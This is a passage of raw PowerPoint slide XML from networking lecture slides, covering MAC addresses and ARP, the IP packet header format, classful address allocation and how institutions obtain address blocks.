            </a:endParaRP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interface has a persistent, global identifier</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MAC (Media Access Control) address</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Burned in to the adaptors Read-Only Memory (ROM)</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Flat address structure (i.e., no hierarchy)</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Construct an address resolution table</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Mapping MAC address to/from IP address</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Address Resolution Protocol (ARP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73F716D0-0EE6-684E-8306-B0BB970AED4D}"/>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100188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62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62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62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624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062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62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06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IP packets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4658043" y="5908975"/>
            <a:ext cx="4558146" cy="356084"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP Packet format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55</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
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6645CD52-AAE8-7C4C-8525-C8BED2AC434C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2976997" y="1131016"/>
            <a:ext cx="6007100" cy="3311525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDE3B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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF3C732E-CF60-A14E-BEE9-34ED56F209D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2978585" y="4433016"/>
            <a:ext cx="6002337" cy="635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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C595AF50-F6A9-3642-AD6C-BFF14759716F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2965885" y="5079128"/>
            <a:ext cx="6002337" cy="825500"/>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7D3ABE0E-2CA4-F649-8B4A-C0621DB7FAF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3035735" y="1859678"/>
            <a:ext cx="5949950" cy="158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4B014579-76BC-E348-8315-A618C582AF53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048435" y="2561353"/>
            <a:ext cx="5954712"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E01E0871-8081-594C-BEEA-E6658FFA51EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048435" y="3209053"/>
            <a:ext cx="5956300"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6105E707-D7A7-114A-AE74-C2F8BB90630D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5942447" y="1156416"/>
            <a:ext cx="1588" cy="202723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182C7905-8280-C148-B218-E4A63DA1BD70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4469247" y="1191341"/>
            <a:ext cx="1588" cy="6588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35C99267-2229-EF4D-A356-A1763A269CC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3745347" y="1191341"/>
            <a:ext cx="1588" cy="6588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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40236070-B11B-AF4E-A4BC-847B3598E0E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2950010" y="1240553"/>
            <a:ext cx="8318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4-bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0BDBBD8-181A-564F-9AD3-DA8C49940D96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3721535" y="1162766"/>
            <a:ext cx="7826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4-bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Length</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D2D0978-B093-DC43-BAD6-92BDA3E58434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4443847" y="1162766"/>
            <a:ext cx="1490663"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8-bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Type of Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(TOS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6AC3895-1CF6-344F-B6E6-77D8029BD193}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6102785" y="1334216"/>
            <a:ext cx="2746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16-bit Total Length (Bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0BDB2AA-764F-4347-A487-C0AD1637FB21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3654860" y="2064466"/>
            <a:ext cx="188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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>16-bit Identification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Line 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBA32838-F99E-634E-AD68-B31A7CCBB103}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6602847" y="1889841"/>
            <a:ext cx="1588" cy="6588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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A54270E-9711-BA4F-9456-6CE73E93CADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5953560" y="1950166"/>
            <a:ext cx="64293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3-bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Flags</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{754CC0CE-F99C-EC4C-AAE6-88AF4DFD0B4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6663172" y="2081928"/>
            <a:ext cx="2217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13-bit Fragment Offset</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Line 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF071C08-0ABE-BF42-9708-C8D7A0732EBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4532747" y="2588341"/>
            <a:ext cx="1588" cy="6016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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{005651A9-EC46-C14A-BDA0-685BB7F07296}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3137335" y="2623266"/>
            <a:ext cx="12827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8-bit Time to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Live (TTL)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{871FC45D-4179-3945-AF90-12BC9D279087}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4510522" y="2720103"/>
            <a:ext cx="1492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8-bit Protocol</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E319814B-61AF-3B45-BE78-ACAEA7D01ADC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6220260" y="2737566"/>
            <a:ext cx="2427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16-bit Header Checksum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Line 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC9D990D-8ADD-684F-B43F-B74BDE314831}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3035735" y="3856753"/>
            <a:ext cx="5967412"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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D16CCDE0-EFB3-B34B-A904-AC6861A35619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4712135" y="3380503"/>
            <a:ext cx="25860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32-bit Source IP Address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB12ABAF-E68A-F041-8FAF-C8C705AA6DB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4542272" y="4005978"/>
            <a:ext cx="30051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32-bit Destination IP Address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD0881D6-A0A6-A446-8604-ECE829CCB552}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5293160" y="4687016"/>
            <a:ext cx="1560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Options (if any)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC163BC9-3A05-0249-A609-7939FD07F2CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5547160" y="5423616"/>
            <a:ext cx="912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Payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="877140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Allocating addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391440" y="1731817"/>
            <a:ext cx="11582400" cy="4624533"/>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In the olden days, only fixed allocation sizes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A: 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Very large /8 blocks (e.g., MIT has 18.0.0.0/8)</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B: 10*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Large /16 blocks (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,. Princeton has 128.112.0.0/16)</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C: 110*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Small /24 blocks (e.g., AT&amp;T Labs has 192.20.225.0/24)</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D: 1110*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Multicast groups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E: 11110*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Reserved for future use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56</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05647" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adapted from course noes by Jennifer Rexford</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3215867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60C8F-3FA8-0347-85B3-7293EC4681C8}"/>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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="874498" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEF6B088-019E-6A47-A93D-BA747C324798}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="226578"/>
            <a:ext cx="10785764" cy="833293"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Obtaining a Block of Addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="874499" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F257AC2-BAF3-7A40-892D-2C2E25F6B084}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="465221" y="1427018"/>
            <a:ext cx="11614484" cy="4897582"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Separation of control</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Prefix: assigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>an institution</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Addresses: assigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
